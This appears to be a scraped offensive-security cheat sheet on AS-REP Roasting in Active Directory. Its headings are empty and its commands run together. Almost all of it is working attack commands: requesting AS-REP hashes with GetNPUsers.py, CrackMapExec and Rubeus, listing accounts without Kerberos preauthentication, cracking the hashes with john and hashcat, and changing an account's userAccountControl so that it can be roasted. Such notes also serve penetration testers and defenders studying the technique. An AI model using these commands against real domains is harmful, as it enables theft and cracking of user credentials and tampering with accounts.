AS-REP Roasting


Cracking :
RedTeam POV:
References :
Last updated
python GetNPUsers.py <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile hashes_asreproast.txtcme ldap <IP> -u <USERNAME> -p '<PASSWORD>' --asreproast hashes_asreproast.txtGet-DomainUser -PreauthNotRequired -verbose .\Rubeus.exe asreproast /format:hashcat /outfile:hashes_asreproast.txtjohn --wordlist=passwords_kerb.txt hashes_asreproast.txt
hashcat -m 18200 --force -a 0 hashes_asreproast.txt passwords_kerb.txtSet-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose